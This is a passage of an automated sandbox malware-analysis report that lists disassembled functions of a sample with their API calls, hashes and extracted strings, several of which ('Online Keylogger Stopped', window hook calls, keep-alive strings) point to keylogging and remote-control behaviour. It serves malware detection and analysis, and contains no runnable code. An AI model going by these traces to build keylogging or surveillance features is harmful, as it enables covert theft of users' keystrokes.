                                                  • Instruction ID: d2a14df90e1c34b1c7064ca59fe7d6c350c405fccd8b54ad0b6ae748ad9a09c7
                                                  • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                  • Instruction Fuzzy Hash: ED419230A402699FCB14EF68C844AAFBBB5FF45328F148165F8155B2D1D732D92ACB91
                                                  Function 02123953 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LG$XG
                                                  • API String ID: 0-1482930923
                                                  • Opcode ID: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                  • Instruction ID: 949f34c0c080b0e9582e2a94a3a75ffc6d8ef452b8d96103084aad81928a028a
                                                  • Opcode Fuzzy Hash: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                  • Instruction Fuzzy Hash: F3312731E807149EDF25DF68984079D77A2DB41324F1081AAFC36FB2D0D378D6488B98
                                                  Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                    • Part of subcall function 004177A2: 70142440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                    • Part of subcall function 00417815: 7015EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: 70165080.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream$70142440701570165080
                                                  • String ID: image/jpeg
                                                  • API String ID: 1403305975-3785015651
                                                  • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                  • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                  Function 02107E43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02107E6F
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 02107EBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 1369699375-3785015651
                                                  • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction ID: 3aed70da93cf067ac781eda2899bbe8257dd0fa0fc29bc6940fdd0ad1b473b8d
                                                  • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                  • Instruction Fuzzy Hash: 36312A76504310AFC311AF64CC84DAFBBE9FF8A704F00095DFA4597251DB75AA099BA2
                                                  Function 020F3C77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 020F3C91
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32(020F3D20,?,?,020F3D20,00465324), ref: 02107933
                                                    • Part of subcall function 0210791D: CloseHandle.KERNEL32($SF,?,?,020F3D20,00465324), ref: 0210793C
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • Sleep.KERNEL32(000000FA,00465324), ref: 020F3D63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: 8>G
                                                  • API String ID: 368326130-2084872820
                                                  • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                  • Instruction ID: 4e9a51ef6b9053c922374b740eb754c955f20b04745fed0df0ee16648f1723d9
                                                  • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                  • Instruction Fuzzy Hash: 69315432A803145FDB98FB74EC95AEE7777AF80310F0000A9EA06679D5EF605A4ADE51
                                                  Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                  Function 02140B45 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,02140DA0,?,00000050,?,?,?,?,?), ref: 02140C20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction ID: 1d4f113e91635e0a5f01af476fb410b66b652797606aaa577a9335d447ffa596
                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction Fuzzy Hash: 7221D666AC0104AAE73C9F66C900B977396EF4CB69F568468EB0DD7104FF32DA45C398
                                                  Function 020FB0BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  • __Init_thread_footer.LIBCMT ref: 020FB10E
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                  • String ID: ,]G$0]G
                                                  • API String ID: 2974294136-589576501
                                                  • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                  • Instruction ID: 96e52a0375c52685cc0f8317bd777ebfcec98ef3a39b5dd8d351323c003c8872
                                                  • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                  • Instruction Fuzzy Hash: 7C21D531A803189FCB94FBB4D890EED7377AF54314F50402ADA016B995EF246E4ADE94
                                                  Function 020FB951 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0210277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0210279E
                                                    • Part of subcall function 0210277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 021027BB
                                                    • Part of subcall function 0210277A: RegCloseKey.ADVAPI32(?), ref: 021027C6
                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 020FB9D3
                                                  • PathFileExistsA.SHLWAPI(?), ref: 020FB9E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                  • String ID: TUF
                                                  • API String ID: 1133728706-3431404234
                                                  • Opcode ID: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                  • Instruction ID: f988e32e71e0e9d98c579a67d2511e03267cb9e7541bbdd0d4a9904542433c80
                                                  • Opcode Fuzzy Hash: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                  • Instruction Fuzzy Hash: 6221A231AC03086ACB84F7F0CC56DEE776A6F54304F4400699F0267984EF659A09DED6
                                                  Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                    • Part of subcall function 004177A2: 70142440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                    • Part of subcall function 00417815: 7015EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: 70165080.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream$70142440701570165080
                                                  • String ID: image/png
                                                  • API String ID: 1403305975-2966254431
                                                  • Opcode ID: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                  • Opcode Fuzzy Hash: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                  Function 02107F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02107F5B
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 02107F80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateStream
                                                  • String ID: image/png
                                                  • API String ID: 1369699375-2966254431
                                                  • Opcode ID: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction ID: 77d09d5054fb164c97dd1308bfb51b5a24c292347147111afd3b420d87a3723e
                                                  • Opcode Fuzzy Hash: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
                                                  • Instruction Fuzzy Hash: F6219335240211AFC711EF64CC84CAFBBAEEF8A750F10051DFA0683161DF75AA46DBA2
                                                  Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 8254ee6c89dc903dda6a8d7813d3c868a55be3ea6077d5cb98a17130acada49a
                                                  • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                  • Opcode Fuzzy Hash: 8254ee6c89dc903dda6a8d7813d3c868a55be3ea6077d5cb98a17130acada49a
                                                  • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                  Function 020F4C21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4C58
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetLocalTime.KERNEL32(?), ref: 020F4CB5
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 020F4C4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                  • Instruction ID: 2a11d003e33d2f249c22f5e460e0240d97def01bcddf206a0ad9104b98e13c89
                                                  • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                  • Instruction Fuzzy Hash: E2218B71A843406FD391F728DC047AF7BD56BD1305F440069EF0903AA1EB68518D9BAF
                                                  Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                  • API String ID: 481472006-2430845779
                                                  • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                  • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                  • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                  • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                  Function 020F6A7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 020F6A9C
                                                    • Part of subcall function 020F69CB: _wcslen.LIBCMT ref: 020F69EF
                                                    • Part of subcall function 020F69CB: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 020F6A50
                                                  • CoUninitialize.COMBASE ref: 020F6AF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                  • API String ID: 3851391207-2322451727
                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction ID: 0f7310af1fcef1b69cc65c301d031644db8946e1390dd6a83eeed6fad373d40a
                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction Fuzzy Hash: 2D01F5723843116BE2A56B21DC4DF7B779CDF41725F21012EFA1087880EFA2DC405A62
                                                  Function 02102855 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 02102879
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 021028AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID: TUF
                                                  • API String ID: 3660427363-3431404234
                                                  • Opcode ID: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                  • Instruction ID: c10d8b68ad31691784dbd8b6d51d76d2aa369d62c9e0726c45f309d1232f5aa8
                                                  • Opcode Fuzzy Hash: b09a7c0ab263ba9602d255bab372d31fcc1af682bb43ba0fd7320c28ba140ab5
                                                  • Instruction Fuzzy Hash: 1C014FB6A00118BFEB059B94DC49EFE7ABEEF48251F10007AF901E2140E7B59F049A64
                                                  Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: alarm.wav$xIG
                                                  • API String ID: 1174141254-4080756945
                                                  • Opcode ID: 921cd58e83faa7af039f32711b20a7e0c911bd48adcaaaa2b4b8115cf6e5031b
                                                  • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                  • Opcode Fuzzy Hash: 921cd58e83faa7af039f32711b20a7e0c911bd48adcaaaa2b4b8115cf6e5031b
                                                  • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                  Function 0210A0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0210A115
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: TUF$xIG
                                                  • API String ID: 1174141254-2109147017
                                                  • Opcode ID: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                  • Instruction ID: 77f1f027222309bf2ec379551f326276d8f5f32ce19bda61d2cbbcfc4c8cbf21
                                                  • Opcode Fuzzy Hash: 2fae138b2d3ec9b0a0b8c660c1a787d1356efb4be69c0d9f0b79cf6aaa7c8617
                                                  • Instruction Fuzzy Hash: 780128213C83015BC658F670C895AEE3B435F80740F00402ADFAA47AE5EFB09D45EB9B
                                                  Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                    • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                  • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: 53ce75cdc14a818cd757adc839ea4e3ac29fb9721298e96b2c089af624b24c59
                                                  • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                  • Opcode Fuzzy Hash: 53ce75cdc14a818cd757adc839ea4e3ac29fb9721298e96b2c089af624b24c59
                                                  • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                  Function 020FA9CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 020FAADD: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 020FAAEB
                                                    • Part of subcall function 020FAADD: wsprintfW.USER32 ref: 020FAB6C
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • CloseHandle.KERNEL32(?), ref: 020FAA31
                                                  • UnhookWindowsHookEx.USER32 ref: 020FAA44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                  • String ID: Online Keylogger Stopped
                                                  • API String ID: 1623830855-1496645233
                                                  • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                  • Instruction ID: 3d38a981a910a26303e53c1fcd03310bbdf28996c34676b571723c6ae2b88a38
                                                  • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                  • Instruction Fuzzy Hash: 7B014C30BC43009FCB527724C8067FD7BB26F41300F40049DDB4202D96EBA15449EBEA
                                                  Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: IsValidLocaleName$j=D
                                                  • API String ID: 1901932003-3128777819
                                                  • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                  • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                  • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
